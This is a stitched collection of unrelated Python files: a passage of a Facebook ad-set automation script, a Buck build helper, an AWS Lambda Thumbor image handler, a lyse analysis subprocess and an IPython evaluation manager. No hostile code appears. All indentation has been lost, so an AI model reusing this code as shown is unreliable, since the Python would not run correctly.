x.targeting.flexible_spec.append({})
x.targeting.flexible_spec[-1]["interests"] = []
for i,j in adset.flexible_spec1:
x.targeting.flexible_spec[-1]["interests"].append({"id":i, "name":j})
if adset.flexible_spec2:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.flexible_spec = [] if "flexible_spec" not in x.targeting else x.targeting.flexible_spec
x.targeting.flexible_spec.append({})
x.targeting.flexible_spec[-1]["interests"] = []
for i,j in adset.flexible_spec2:
x.targeting.flexible_spec[-1]["interests"].append({"id":i, "name":j})
if adset.flexible_spec3:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.flexible_spec = [] if "flexible_spec" not in x.targeting else x.targeting.flexible_spec
x.targeting.flexible_spec.append({})
x.targeting.flexible_spec[-1]["interests"] = []
for i,j in adset.flexible_spec3:
x.targeting.flexible_spec[-1]["interests"].append({"id":i, "name":j})
if adset.flexible_spec4:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.flexible_spec = [] if "flexible_spec" not in x.targeting else x.targeting.flexible_spec
x.targeting.flexible_spec.append({})
x.targeting.flexible_spec[-1]["interests"] = []
for i,j in adset.flexible_spec4:
x.targeting.flexible_spec[-1]["interests"].append({"id":i, "name":j})
if adset.flexible_spec5:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.flexible_spec = [] if "flexible_spec" not in x.targeting else x.targeting.flexible_spec
x.targeting.flexible_spec.append({})
x.targeting.flexible_spec[-1]["interests"] = []
for i,j in adset.flexible_spec5:
x.targeting.flexible_spec[-1]["interests"].append({"id":i, "name":j})
x.targeting = dict(x.targeting)
try:x.promoted_object = dict(x.promoted_object)
except Exception as e:print(e)
x = dict(x)
return x
def algorithm4(self,id):
a_shop()
adset = Get(Adset,adset_id=id)
if adset.status=="ACTIVE":
data = keysort("date", Adsethourlyinsight.objects.filter(adset_id=adset.adset_id), tcer=False)
impressions = 0; sales = 0
for x in data:
impressions+=x.impression
sales+=x.website_purchase
print(impressions, sales)
if impressions > 500:
if sales < 1:
print("stop")
print("[adset_id][%s]"%adset.adset_id)
input("please check it, impressions: %s, sales: %s" % (impressions, sales))
AdSet(adset.adset_id).remote_update(params={"status":"PAUSED"})
break
def update_advertisement_all(self, id):
# OSA.log("1")
July_Adset_Utilities().update_adset(id=id)
# OSA.log("2")
July_Adset_Utilities().update_adset_targeting_data(id=id)
# OSA.log("3")
July_Adset_Utilities().update_adsetinsight_data(id=id)
# OSA.log("4")
July_Adset_Utilities().update_adsethourlyinsight_data(id=id)
# OSA.log("5")
July_Adset_Utilities().stop_adset_based_on_today_data(id=id)
# OSA.log("6")
July_Adset_Utilities().stop_adset_based_on_past_data(id=id)
# OSA.log("7")
July_Adset_Utilities().restart_adset_based_on_today_data(id=id)
# OSA.log("8")
July_Adset_Utilities().algorithm4(id=id)
# OSA.log("I")
July_Adset_Utilities().update_ad_keyword_data(id=id)
# OSA.log("J")
x = datetime.now()
Update(Get(Adset,adset_id=id),last_check=datetime.now())
# OSA.log("L")
return x.strftime("%Y,%m,%d,%H,%M,%S")
def update_advertisements(self,shop):
for i in Filter(Adset,shop_abbreviation=shop):
July_Adset_Utilities().update_advertisement_all(i.adset_id)
def tests(self):
#July_Adset_Utilities().update_adsets()
#July_Adset_Utilities().update_adsetinsight_data(date_start = 30, date_end = 0)
#data = CSV().pick_data(Adsetinsight.objects.all(), ["spend","adset_id","date","frequency","impression","impression_cost","impression_rate","post_click","post_click_cost","post_click_rate","click","click_cost","click_rate","add_to_cart","add_to_cart_cost","add_to_cart_rate","website_purchase","website_purchase_cost","website_purchase_rate","spend","website_purchase_value","return_on_investment","reach","reach_cost","reach_rate","landing_page_view","landing_page_view_cost","landing_page_view_rate","fb_pixel_view_content","fb_pixel_view_content_cost","fb_pixel_view_content_rate","fb_pixel_initiate_checkout","fb_pixel_initiate_checkout_cost","fb_pixel_initiate_checkout_rate","page_engagement","page_engagement_cost","page_engagement_rate","post_engagement","post_engagement_cost","post_engagement_rate","post_reaction","post_reaction_cost","post_reaction_rate"])
#CSV().DictWriteWithHeaders("out.csv", data, headers=["spend","adset_id","date","frequency","impression","impression_cost","impression_rate","post_click","post_click_cost","post_click_rate","click","click_cost","click_rate","add_to_cart","add_to_cart_cost","add_to_cart_rate","website_purchase","website_purchase_cost","website_purchase_rate","spend","website_purchase_value","return_on_investment","reach","reach_cost","reach_rate","landing_page_view","landing_page_view_cost","landing_page_view_rate","fb_pixel_view_content","fb_pixel_view_content_cost","fb_pixel_view_content_rate","fb_pixel_initiate_checkout","fb_pixel_initiate_checkout_cost","fb_pixel_initiate_checkout_rate","page_engagement","page_engagement_cost","page_engagement_rate","post_engagement","post_engagement_cost","post_engagement_rate","post_reaction","post_reaction_cost","post_reaction_rate"])
CSV().dictlist_to_xlsx(Adsetinsight.objects.all(), ["spend","adset_id","date","frequency","impression","impression_cost","impression_rate","post_click","post_click_cost","post_click_rate","click","click_cost","click_rate","add_to_cart","add_to_cart_cost","add_to_cart_rate","website_purchase","website_purchase_cost","website_purchase_rate","spend","website_purchase_value","return_on_investment","reach","reach_cost","reach_rate","landing_page_view","landing_page_view_cost","landing_page_view_rate","fb_pixel_view_content","fb_pixel_view_content_cost","fb_pixel_view_content_rate","fb_pixel_initiate_checkout","fb_pixel_initiate_checkout_cost","fb_pixel_initiate_checkout_rate","page_engagement","page_engagement_cost","page_engagement_rate","post_engagement","post_engagement_cost","post_engagement_rate","post_reaction","post_reaction_cost","post_reaction_rate"],
workbook = ".xlsx", sheet="sheet" )
July_Adset_Utilities().stop_adsets_based_on_today_data()
July_Adset_Utilities().stop_adsets_based_on_past_data()
July_Adset_Utilities().restart_adsets_based_on_today_data()
|
buck.py
|
# Copyright 2004-present Facebook. All rights reserved.
import functools
import glob
import json
import logging
import os
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from json.decoder import JSONDecodeError
from logging import Logger
from typing import Dict, Iterable, List, NamedTuple, Optional, Set, Tuple
from .filesystem import find_root
LOG: Logger = logging.getLogger(__name__)
class BuckOut(NamedTuple):
source_directories: Set[str]
targets_not_found: Set[str]
class BuckException(Exception):
pass
class BuckBuilder:
def build(self, targets: Iterable[str]) -> Iterable[str]:
"""
Build the given targets, and return a list of output directories
containing the target output.
"""
raise NotImplementedError
class FastBuckBuilder(BuckBuilder):
def __init__(
self,
buck_root: str,
output_directory: Optional[str] = None,
buck_builder_binary: Optional[str] = None,
debug_mode: bool = False,
buck_mode: Optional[str] = None,
project_name: Optional[str] = None,
) -> None:
self._buck_root = buck_root
self._output_directory: str = output_directory or tempfile.mkdtemp(
prefix="pyre_tmp_"
)
self._buck_builder_binary = buck_builder_binary
self._debug_mode = debug_mode
self._buck_mode = buck_mode
self._project_name = project_name
self.conflicting_files: List[str] = []
self.unsupported_files: List[str] = []
def _get_builder_executable(self) -> str:
builder_binary = self._buck_builder_binary
if builder_binary is None:
raise BuckException(
"--buck-builder-binary must be provided "
"if fast buck builder is used."
)
return builder_binary
def build(self, targets: Iterable[str]) -> List[str]:
command = [
self._get_builder_executable(),
"-J-Djava.net.preferIPv6Addresses=true",
"-J-Djava.net.preferIPv6Stack=true",
"--buck_root",
self._buck_root,
"--output_directory",
self._output_directory,
] + list(targets)
if self._debug_mode:
command.append("--debug")
buck_mode = self._buck_mode
if buck_mode:
command.extend(["--mode", buck_mode])
project_name = self._project_name
if project_name:
command.extend(["--project_name", project_name])
LOG.info("Building buck targets...")
LOG.debug("Buck builder command: `{}`".format(" ".join(command)))
with subprocess.Popen(
command,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
) as buck_builder_process:
# Java's logging conflicts with Python's logging, we capture the
# logs and re-log them with python's logger.
log_processor = threading.Thread(
target=self._read_stderr, args=(buck_builder_process.stderr,)
)
log_processor.daemon = True
log_processor.start()
return_code = buck_builder_process.wait()
# Wait until all stderr have been printed.
log_processor.join()
if return_code == 0:
LOG.info("Finished building targets.")
if self._debug_mode:
# pyre-fixme[6]: Expected `_Reader` for 1st param but got
# `Optional[typing.IO[typing.Any]]`.
debug_output = json.load(buck_builder_process.stdout)
self.conflicting_files += debug_output["conflictingFiles"]
self.unsupported_files += debug_output["unsupportedFiles"]
return [self._output_directory]
else:
raise BuckException(
f"Failed to build targets with:\n`{' '.join(command)}`"
)
def _read_stderr(
self, stream: Iterable[str], default_logging_section: int = logging.INFO
) -> None:
for line in stream:
line = line.rstrip()
if line.startswith("INFO: "):
LOG.info(line[6:])
elif line.startswith("WARNING: "):
LOG.warning(line[9:])
elif line.startswith("ERROR: "):
LOG.error(line[7:])
elif line.startswith("[WARNING:"):
# Filter away thrift warnings.
pass
else:
LOG.log(default_logging_section, line)
class SimpleBuckBuilder(BuckBuilder):
def build(self, targets: Iterable[str]) -> Iterable[str]:
"""
Shell out to buck to build the targets, then yield the paths to the
link trees.
"""
return generate_source_directories(targets)
def presumed_target_root(target: str) -> str:
root_index = target.find("//")
if root_index != -1:
target = target[root_index + 2 :]
target = target.replace("/...", "")
target = target.split(":")[0]
return target
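# Minimal usage sketch (target strings are illustrative):
#   presumed_target_root("//tools/foo:bar")  -> "tools/foo"
#   presumed_target_root("//tools/foo/...")  -> "tools/foo"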
# Expects the targets to be already normalized.
def _find_built_source_directories(
targets_to_destinations: Iterable[Tuple[str, str]]
) -> BuckOut:
targets_not_found = []
source_directories = []
buck_root = find_buck_root(os.getcwd())
if buck_root is None:
raise Exception("No .buckconfig found in ancestors of the current directory.")
directories = set()
for target, destination in targets_to_destinations:
directories.add((target, os.path.dirname(destination)))
for target, directory in directories:
target_name = target.split(":")[1]
discovered_source_directories = glob.glob(
os.path.join(buck_root, directory, "{}#*link-tree".format(target_name))
)
if len(discovered_source_directories) == 0:
targets_not_found.append(target)
source_directories.extend(
[
tree
for tree in discovered_source_directories
if not tree.endswith(
(
"-vs_debugger#link-tree",
"-interp#link-tree",
"-ipython#link-tree",
)
)
]
)
return BuckOut(set(source_directories), set(targets_not_found))
def _normalize(targets: List[str]) -> List[Tuple[str, str]]:
LOG.info(
"Normalizing target%s `%s`",
"s:" if len(targets) > 1 else "",
"`, `".join(targets),
)
try:
command = (
["buck", "targets", "--show-output"]
+ targets
+ ["--type", "python_binary", "python_test"]
)
targets_to_destinations: List[str] = (
subprocess.check_output(command, stderr=subprocess.PIPE, timeout=600)
.decode()
.strip()
.split("\n")
)
targets_to_destinations = list(filter(bool, targets_to_destinations))
# The output is of the form //target //corresponding.par
result = []
for target in targets_to_destinations:
pair = target.split(" ")
if len(pair) != 2:
pass
else:
result.append((pair[0], pair[1]))
if not result:
LOG.warning(
"Provided targets do not contain any binary or unittest targets."
)
return []
else:
LOG.info(
"Found %d buck target%s.", len(result), "s" if len(result) > 1 else ""
)
return result
except subprocess.TimeoutExpired as error:
LOG.error("Buck output so far: %s", error.stderr.decode().strip())
raise BuckException(
"Seems like `{}` is hanging.\n "
"Try running `buck clean` before trying again.".format(
" ".join(command[:-1])
)
)
except subprocess.CalledProcessError as error:
LOG.error("Buck returned error: %s" % error.stderr.decode().strip())
raise BuckException(
"Could not normalize targets. Check the paths or run `buck clean`."
)
def _build_targets(targets: List[str], original_targets: List[str]) -> None:
LOG.info(
"Building target%s `%s`",
"s:" if len(original_targets) > 1 else "",
"`, `".join(original_targets),
)
command = ["buck", "build"] + targets
try:
subprocess.check_output(command, stderr=subprocess.PIPE)
LOG.warning("Finished building targets.")
except subprocess.CalledProcessError as error:
# The output can be overwhelming, hence print only the last 20 lines.
lines = error.stderr.decode().splitlines()
LOG.error("Buck returned error: %s" % "\n".join(lines[-20:]))
raise BuckException(
"Could not build targets. Check the paths or run `buck clean`."
)
def _map_normalized_targets_to_original(
unbuilt_targets: Iterable[str], original_targets: Iterable[str]
) -> List[str]:
mapped_targets = set()
for target in unbuilt_targets:
# Each original target is either a `/...` glob or a proper target.
# If it's a glob, we're looking for the glob to be a prefix of the unbuilt
# target. Otherwise, we care about exact matches.
name = None
for original in original_targets:
if original.endswith("/..."):
if target.startswith(original[:-4]):
name = original
else:
if target == original:
name = original
# No original target matched, fallback to normalized.
if name is None:
name = target
mapped_targets.add(name)
return list(mapped_targets)
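# Illustrative mapping (targets are placeholders): with original targets ["//tools/...", "//lib:app"],
# an unbuilt normalized target "//tools/foo:bar" maps back to the glob "//tools/...", "//lib:app" maps
# to itself, and anything unmatched falls back to its normalized name.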
@functools.lru_cache()
def find_buck_root(path: str) -> Optional[str]:
return find_root(path, ".buckconfig")
def query_buck_relative_paths(
project_paths: Iterable[str], targets: Iterable[str]
) -> Dict[str, str]:
"""Return a mapping from each absolute project path to its relative location
in the buck output directory.
This queries buck and only returns paths that are covered by `targets`."""
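# Illustrative return value (paths and directories are placeholders):
#   {"/repo/project/foo/bar.py": "project/foo/bar.py"}
# where each key is an absolute project path and each value is its location relative to the buck
# output directory, honoring any base_module remapping handled below.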
buck_root = find_buck_root(os.getcwd())
if buck_root is None:
LOG.error(
"Buck root couldn't be found. Returning empty analysis directory mapping."
)
return {}
target_string = " ".join(targets)
command = [
"buck",
"query",
"--json",
"--output-attribute",
".*",
# This will get only those owner targets that are beneath our targets or
# the dependencies of our targets.
f"owner(%s) ^ deps(set({target_string}))",
*project_paths,
]
LOG.info(f"Running command: {command}")
try:
owner_output = json.loads(
subprocess.check_output(command, timeout=30, stderr=subprocess.DEVNULL)
.decode()
.strip()
)
except (
subprocess.TimeoutExpired,
subprocess.CalledProcessError,
JSONDecodeError,
) as error:
raise BuckException("Querying buck for relative paths failed: {}".format(error))
results = {}
for project_path in project_paths:
for target_data in owner_output.values():
prefix = os.path.join(buck_root, target_data["buck.base_path"]) + os.sep
suffix = project_path[len(prefix) :]
if not project_path.startswith(prefix) or suffix not in target_data["srcs"]:
continue
if "buck.base_module" in target_data:
base_path = os.path.join(*target_data["buck.base_module"].split("."))
elif "base_module" in target_data:
base_path = os.path.join(*target_data["base_module"].split("."))
else:
base_path = target_data["buck.base_path"]
results[project_path] = os.path.join(base_path, target_data["srcs"][suffix])
# Break after the first one because there might be multiple matches.
break
return results
def generate_source_directories(original_targets: Iterable[str]) -> Set[str]:
original_targets = list(original_targets)
targets_to_destinations = _normalize(original_targets)
targets = [pair[0] for pair in targets_to_destinations]
_build_targets(targets, original_targets)
buck_out = _find_built_source_directories(targets_to_destinations)
source_directories = buck_out.source_directories
if buck_out.targets_not_found:
message_targets = _map_normalized_targets_to_original(
buck_out.targets_not_found, original_targets
)
raise BuckException(
"Could not find link trees for:\n `{}`.\n "
"See `{} --help` for more information.".format(
" \n".join(message_targets), sys.argv[0]
)
)
return source_directories
|
lambda_function.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
##############################################################################
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Amazon Software License (the "License"). You may not #
# use this file except in compliance with the License. A copy of the #
# License is located at #
# #
# http://aws.amazon.com/asl/ #
# #
# or in the "license" file accompanying this file. This file is distributed #
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, #
# express or implied. See the License for the specific language governing #
# permissions and limitations under the License. #
##############################################################################
from __future__ import print_function
import cStringIO
import base64
import requests_unixsocket
import threading
import time
import mimetypes
import traceback
import os.path
import json
import os
import timeit
import ast
from image_handler import lambda_metrics
from image_handler import lambda_rewrite
from PIL import Image
from io import BytesIO
from distutils.util import strtobool
from tornado.httpserver import HTTPServer
from tornado.netutil import bind_unix_socket
from tornado.options import options, define
from thumbor.console import get_server_parameters
from thumbor.context import ServerParameters
from thumbor.server import *
thumbor_config_path = '/var/task/image_handler/thumbor.conf'
thumbor_socket = '/tmp/thumbor'
unix_path = 'http+unix://%2Ftmp%2Fthumbor'
def response_formater(status_code='400',
body={'message': 'error'},
cache_control='max-age=120,public',
content_type='application/json',
expires='',
etag='',
date='',
vary=False
):
api_response = {
'statusCode': status_code,
'headers': {
'Content-Type': content_type
}
}
if str(os.environ.get('ENABLE_CORS')).upper() == "YES":
api_response['headers']['Access-Control-Allow-Origin'] = os.environ.get('CORS_ORIGIN')
if int(status_code) != 200:
api_response['body'] = json.dumps(body)
api_response['headers']['Cache-Control'] = cache_control
else:
api_response['body'] = body
api_response['isBase64Encoded'] = 'true'
api_response['headers']['Expires'] = expires
api_response['headers']['Etag'] = etag
api_response['headers']['Cache-Control'] = cache_control
api_response['headers']['Date'] = date
if vary:
api_response['headers']['Vary'] = vary
logging.debug(api_response)
return api_response
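# Illustrative example (values are placeholders): a successful call such as
#   response_formater(status_code='200', body='<base64 image bytes>', content_type='image/png')
# yields {'statusCode': '200', 'headers': {'Content-Type': 'image/png', 'Expires': '', 'Etag': '',
#         'Cache-Control': 'max-age=120,public', 'Date': ''}, 'body': '<base64 image bytes>',
#         'isBase64Encoded': 'true'}, while the default arguments produce a JSON error body instead.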
def run_server(application, context):
server = HTTPServer(application)
define(
'unix_socket',
group='webserver',
default=thumbor_socket,
help='Path to unix socket to bind')
socket = bind_unix_socket(options.unix_socket)
server.add_socket(socket)
server.start(1)
def stop_thumbor():
tornado.ioloop.IOLoop.instance().stop()
try:
os.remove(thumbor_socket)
except OSError as error:
logging.error('stop_thumbor error: %s' % (error))
def start_thumbor():
try:
server_parameters = ServerParameters(
port=8888,
ip='0.0.0.0',
config_path=None,
keyfile=False,
log_level=log_level,
app_class='thumbor.app.ThumborServiceApp')
global config
config = get_config(thumbor_config_path)
config.allow_environment_variables()
configure_log(config, server_parameters.log_level)
importer = get_importer(config)
os.environ["PATH"] += os.pathsep + '/var/task'
validate_config(config, server_parameters)
with get_context(server_parameters, config, importer) as thumbor_context:
application = get_application(thumbor_context)
run_server(application, thumbor_context)
tornado.ioloop.IOLoop.instance().start()
logging.info(
'thumbor running at %s:%d' %
(thumbor_context.server.ip, thumbor_context.server.port)
)
return config
except RuntimeError as error:
if str(error) != "IOLoop is already running":
logging.error('start_thumbor RuntimeError: %s' % (error))
stop_thumbor()
except Exception as error:
stop_thumbor()
logging.error('start_thumbor error: %s' % (error))
logging.error('start_thumbor trace: %s' % traceback.format_exc())
def start_server():
t = threading.Thread(target=start_thumbor)
t.daemon = True
t.start()
return t
def restart_server():
threads = threading.enumerate()
main_thread = threading.current_thread()
for t in threads:
if t is not main_thread:
t.exit()
t.join()
start_server()
def auto_webp(original_request, request_headers):
headers = {'Accept':'*/*'}
vary = bool(strtobool(str(config.AUTO_WEBP)))
if vary:
if original_request.get('headers'):
if original_request['headers'].get('Accept'):
request_headers['Accept'] = original_request['headers']['Accept']
return vary, request_headers
def allow_unsafe_url(http_path):
if bool(strtobool(str(config.ALLOW_UNSAFE_URL))):
http_path = '/unsafe' + http_path
return http_path
def rewrite(http_path):
if str(os.environ.get('REWRITE_ENABLED')).upper() == 'YES':
http_path = lambda_rewrite.match_patterns(http_path)
return http_path
def is_thumbor_down():
if not os.path.exists(thumbor_socket):
start_server()
session = requests_unixsocket.Session()
http_health = '/healthcheck'
retries = 10
while(retries > 0):
try:
response = session.get(unix_path + http_health)
if (response.status_code == 200):
break
except Exception as error:
time.sleep(0.03)
retries -= 1
continue
if retries <= 0:
logging.error(
'call_thumbor error: tornado server unavailable,\
proceeding with tornado server restart'
)
restart_server()
return response_formater(status_code='502'), None
return False, session
def request_thumbor(original_request, session):
http_path = original_request['path']
http_path = rewrite(http_path);
http_path = allow_unsafe_url(http_path)
request_headers = {}
vary, request_headers = auto_webp(original_request, request_headers)
return session.get(unix_path + http_path, headers=request_headers), vary
def process_thumbor_responde(thumbor_response, vary):
if thumbor_response.status_code != 200:
return response_formater(status_code=thumbor_response.status_code)
if vary:
vary = thumbor_response.headers['vary']
content_type = thumbor_response.headers['content-type']
body = gen_body(content_type, thumbor_response.content)
if body is None:
return response_formater(status_code='500',
cache_control='no-cache,no-store')
return response_formater(status_code='200',
body=body,
cache_control=thumbor_response.headers['Cache-Control'],
content_type=content_type,
expires=thumbor_response.headers['Expires'],
etag=thumbor_response.headers['Etag'],
date=thumbor_response.headers['Date'],
vary=vary
)
def call_thumbor(original_request):
thumbor_down, session = is_thumbor_down()
if thumbor_down:
return thumbor_down
thumbor_response, vary = request_thumbor(original_request, session)
return process_thumbor_responde(thumbor_response, vary)
def gen_body(ctype, content):
'''Convert image to base64 to be sent as body response. '''
try:
format_ = ctype[ctype.find('/')+1:]
supported = ['jpeg', 'png', 'gif']
if format_ not in supported:
return None
return base64.b64encode(content)
except Exception as error:
logging.error('gen_body error: %s' % (error))
logging.error('gen_body trace: %s' % traceback.format_exc())
return None
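# Illustrative behaviour (bytes are placeholders): gen_body('image/png', b'...') returns the
# base64-encoded payload, while an unsupported type such as 'image/tiff' returns None.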
def send_metrics(event, result, start_time):
t = threading.Thread(
target=lambda_metrics.send_data,
args=(event, result, start_time, )
)
t.start()
return t
def lambda_handler(event, context):
try:
start_time = timeit.default_timer()
global log_level
log_level = str(os.environ.get('LOG_LEVEL')).upper()
if log_level not in [
'DEBUG', 'INFO',
'WARNING', 'ERROR',
'CRITICAL'
]:
log_level = 'ERROR'
logging.getLogger().setLevel(log_level)
if event['requestContext']['httpMethod'] != 'GET' and\
event['requestContext']['httpMethod'] != 'HEAD':
return response_formater(status_code=405)
result = call_thumbor(event)
if str(os.environ.get('SEND_ANONYMOUS_DATA')).upper() == 'YES':
send_metrics(event, result, start_time)
return result
except Exception as error:
logging.error('lambda_handler error: %s' % (error))
logging.error('lambda_handler trace: %s' % traceback.format_exc())
return response_formater(status_code='500',
cache_control='no-cache,no-store')
|
analysis_subprocess.py
|
#####################################################################
# #
# /analysis_subprocess.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program lyse, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
import excepthook
import matplotlib
matplotlib.use("GTKAgg")
import lyse
lyse.spinning_top = True
import lyse.figure_manager
import sys
import os
import threading
import traceback
import time
import gtk
import gobject
from matplotlib.backends.backend_gtkagg import FigureCanvasGTKAgg as FigureCanvas
from matplotlib.backends.backend_gtkagg import NavigationToolbar2GTKAgg as NavigationToolbar
import pylab
import zlock, h5_lock, h5py
import subproc_utils
from filewatcher.modulewatcher import ModuleWatcher
if not sys.stdout.isatty():
# Prevent bug on windows where writing to stdout without a command
# window causes a crash:
sys.stdout = sys.stderr = open(os.devnull,'w')
if os.name == 'nt':
# Make it not look so terrible (if icons and themes are installed):
settings = gtk.settings_get_default()
settings.set_string_property('gtk-icon-theme-name', 'gnome-human', '')
settings.set_string_property('gtk-theme-name', 'Clearlooks', '')
settings.set_string_property('gtk-font-name', 'ubuntu 9', '')
# Have Windows 7 consider this program to be a separate app, and not
# group it with other Python programs in the taskbar:
import ctypes
myappid = 'monashbec.labscript.lyse.1-0' # arbitrary string
try:
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
except:
pass
class AnalysisWorker(object):
def __init__(self, filepath, to_parent, from_parent):
self.to_parent = to_parent
self.from_parent = from_parent
self.filepath = filepath
# Keeping track of figures and canvases:
self.figures = []
self.canvases = []
self.windows = {}
# Whether or not to autoscale each figure with new data:
self.autoscaling = {}
# An object with a method to unload user modules if any have
# changed on disk:
self.modulewatcher = ModuleWatcher()
# Start the thread that listens for instructions from the
# parent process:
self.mainloop_thread = threading.Thread(target=self.mainloop)
self.mainloop_thread.daemon = True
self.mainloop_thread.start()
def mainloop(self):
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
while True:
task, data = self.from_parent.get()
with kill_lock:
if task == 'quit':
with gtk.gdk.lock:
gtk.main_quit()
elif task == 'reset figs':
self.reset_figs()
elif task == 'single' or task == 'multi':
try:
self.do_analysis(task,data)
self.to_parent.put(['done',None])
except:
traceback_lines = traceback.format_exception(sys.exc_type, sys.exc_value, sys.exc_traceback)
del traceback_lines[1:3]
message = ''.join(traceback_lines)
sys.stderr.write(message)
self.to_parent.put(['error', message])
else:
self.to_parent.put(['error','invalid task %s'%str(task)])
def do_analysis(self,task,path):
axis_limits = {}
with gtk.gdk.lock:
for f in self.figures:
for i, a in enumerate(f.axes):
# Save the limits of the axes to restore them afterward:
axis_limits[f,i] = a.get_xlim(), a.get_ylim()
f.clear()
# The namespace the routine will run in:
sandbox = {'path':path,'__file__':self.filepath,'__name__':'__main__'}
# Do not let the modulewatcher unload any modules whilst we're working:
with self.modulewatcher.lock:
# Actually run the user's analysis!
execfile(self.filepath,sandbox,sandbox)
# reset the current figure to figure 1:
lyse.figure_manager.figuremanager.set_first_figure_current()
# Introspect the figures that were produced:
with gtk.gdk.lock:
for identifier, fig in lyse.figure_manager.figuremanager.figs.items():
if not fig.axes:
continue
elif not fig in self.figures:
# If we don't already have this figure, make a window
# to put it in:
gobject.idle_add(self.new_figure,fig,identifier)
else:
gobject.idle_add(self.update_window_title_idle, self.windows[fig], identifier)
if not self.autoscaling[fig].get_active():
# Restore the axis limits:
for j, a in enumerate(fig.axes):
a.autoscale(enable=False)
try:
xlim, ylim = axis_limits[fig,j]
a.set_xlim(xlim)
a.set_ylim(ylim)
except KeyError:
continue
else:
for j, a in enumerate(fig.axes):
a.autoscale(enable=True)
# Redraw all figures:
with gtk.gdk.lock:
for canvas in self.canvases:
canvas.draw()
def update_window_title_idle(self, window, identifier):
with gtk.gdk.lock:
self.update_window_title(window,identifier)
def update_window_title(self, window, identifier):
window.set_title(str(identifier) + ' - ' + os.path.basename(self.filepath))
def new_figure(self, fig, identifier):
with gtk.gdk.lock:
window = gtk.Window()
self.update_window_title(window, identifier)
l, w = fig.get_size_inches()
window.resize(int(l*100),int(w*100))
window.set_icon_from_file('lyse.svg')
c = FigureCanvas(fig)
v = gtk.VBox()
n = NavigationToolbar(c,window)
b = gtk.ToggleButton('Autoscale')
v.pack_start(b,False,False)
v.pack_start(c)
v.pack_start(n,False,False)
window.add(v)
window.show_all()
window.present()
self.canvases.append(c)
self.figures.append(fig)
self.autoscaling[fig] = b
self.windows[fig] = window
def reset_figs(self):
pass
if __name__ == '__main__':
gtk.threads_init()
##########
# import tracelog
# tracelog.log('tracelog_analysis_subprocess',['__main__','subproc_utils','lyse','filewatcher'])
##########
to_parent, from_parent, kill_lock = subproc_utils.setup_connection_with_parent(lock = True)
filepath = from_parent.get()
# Set a meaningful client id for zlock:
zlock.set_client_process_name('lyse-'+os.path.basename(filepath))
####
# tracelog.set_file('tracelog_%s.log'%os.path.basename(filepath))
####
worker = AnalysisWorker(filepath, to_parent, from_parent)
with gtk.gdk.lock:
gtk.main()
|
evaluate.py
|
import sys
import multiprocessing as mp
import multiprocessing.queues as mpq
from IPython.core.interactiveshell import InteractiveShell
from IPython.utils import io
from PyQt5.QtCore import QCoreApplication, QObject, QThread, pyqtSignal
class StdoutQueue(mpq.Queue):
"""
Multiprocessing Queue to be used in place of a simple file descriptor.
https://stackoverflow.com/a/39508408
"""
def __init__(self, *args, **kwargs):
ctx = mp.get_context()
super().__init__(*args, **kwargs, ctx=ctx)
def write(self, msg):
self.put(msg)
def flush(self):
sys.__stdout__.flush()
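# Illustrative sketch (not part of the original module; names are hypothetical):
# a child process can use a StdoutQueue in place of sys.stdout while the parent
# drains it, which is how ProcessManager below forwards prints from user code.
#
#   q = StdoutQueue()
#   def child(q):
#       sys.stdout = q                  # every write() becomes q.put(msg)
#       print('hello from the child')
#   mp.Process(target=child, args=(q,), daemon=True).start()
#   print(q.get())                      # parent receives 'hello from the child'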
class QueueMonitor(QThread):
def __init__(self, queue, signal):
super().__init__()
self.queue = queue
self.signal = signal
self.start()
def __del__(self):
self.terminate()
self.wait()
def run(self):
while True:
self.signal.emit(self.queue.get())
def process(conn, stdout):
shell = InteractiveShell()
orig, sys.stdout = sys.stdout, stdout
execRes = shell.run_cell(conn.recv())
sys.stdout = orig
res = (execRes.result, execRes.error_before_exec or execRes.error_in_exec)
conn.send(res)
class Signals(QObject):
started = pyqtSignal()
finished = pyqtSignal()
result = pyqtSignal(object)
error = pyqtSignal()
stdout = pyqtSignal(str)
class ProcessManager(QThread):
def __init__(self):
super().__init__()
self.signals = Signals()
self.busy = False
self.proc = None
self.pipe = mp.Pipe()
self.stout = StdoutQueue()
self.stoutMonitor = QueueMonitor(self.stout, self.signals.stdout)
# def __del__(self):
# if self.isRunning():
# self.stop()
def run(self):
while True:
# manager and process ends of a pipe
(mgrConn, procConn) = self.pipe
args = (procConn, self.stout)
p = self.proc = mp.Process(target=process, args=args, daemon=True)
p.start()
p.join()
p.close()
self.busy = False
# if process was not interrupted, we have a (result, exception)
if mgrConn.poll():
badType = False
res, exc = None, None
try:
res, exc = mgrConn.recv()
badType = type(res) != dict
except AttributeError:
badType = True
if not exc and badType:
err = "\nError: Return type must be a dict " \
"containing only primitives and collections."
self.signals.stdout.emit(err)
self.signals.error.emit()
continue
if exc:
self.signals.error.emit()
else:
self.signals.result.emit(res)
self.signals.finished.emit()
if self.isInterruptionRequested():
break
def stop(self):
"""Terminate the process and interrupt the thread."""
self.requestInterruption()
self.stopEvaluation()
self.wait()
def isEvaluating(self):
return self.busy
def startEvaluation(self, raw):
"""Evaluate raw code with process"""
assert(not self.isEvaluating())
self.busy = True
(mgrConn, procConn) = self.pipe
# clear any waiting code
while procConn.poll():
procConn.recv()
mgrConn.send(raw)
self.signals.started.emit()
def stopEvaluation(self):
# terminate the current process
self.proc.terminate()
# wait until process is no longer running
while self.busy:
pass
# may need to resort to .kill()
if __name__ == '__main__':
app = QCoreApplication(sys.argv)
pm = ProcessManager()
pm.signals.result.connect(print)
pm.signals.stdout.connect(print)
pm.start()
# only one evaluation may run at a time; wait for the 'finished' signal
# before calling startEvaluation() again
